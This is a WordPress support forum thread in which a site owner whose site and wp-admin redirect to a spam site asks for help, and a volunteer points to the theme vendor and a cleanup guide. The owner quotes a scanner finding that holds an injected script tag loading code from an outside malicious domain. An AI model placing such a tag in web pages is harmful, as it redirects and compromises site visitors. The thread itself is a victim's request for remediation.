• Hi my site was hacked so that it redirected to somewhere.
I was able to update through Installatron and my site is operational, but wp-admin still re-directs to this spam-site.

How could I gain access to the wp-admin?

    My WP version is 5.1.1
The Installatron update could not update the WP version for some reason.
It “updates” to 5.1.1 even when I’ve selected to update to 5.1.8

    My site is at ksjt.fi
So the ksjt.fi/wp-admin/ wont work it redirects to somewhere.

The whole site did it before I updated through Installatron.
    Now just the wp-admin

I ran the Sucuri through it and it points to:

    <script src=’https://tron.talkingaboutfirms.ga/main.js?s=553&b=2&cid=11141&#8242; type=’text/javascript’></script>
    tron.talkingaboutfirms.ga

    Saying:

    https://ksjt.fi/wp-content/themes/minus/

    Is the culprit.

So this must be a vulnerability of the “Minus” theme?
I use this theme from Thrive Themes.

Any Idea on how to get the malware away for good and how to get the wp-admin to respond correctly instead of redirecting?

Since you use a commercial theme or plugin and need support, please go to their official support channel. In order to be good stewards of the WordPress community, and encourage innovation and progress, we feel it’s important to direct people to those official locations: https://thrivethemes.com/themes/minus/

Forum volunteers are also not given access to commercial products, so they would not know why your commercial theme or plugin is not working properly. This is one other reason why volunteers forward you to the commercial product’s vendors. The vendors are responsible for supporting their commercial product.

Commercial products are not supported in these forums.

    Also, Carefully follow this guide.

When you’re done, you may want to implement some (if not all) of the recommended security measures and start backing up your site.

    I got this now!

My wp-admin sourcecode directs to the spammy site.
It has nothing else than the spammy redirection in the source.

Any way that I could get the correct wp-admin file for WP 5.1.1?

    Thank you!
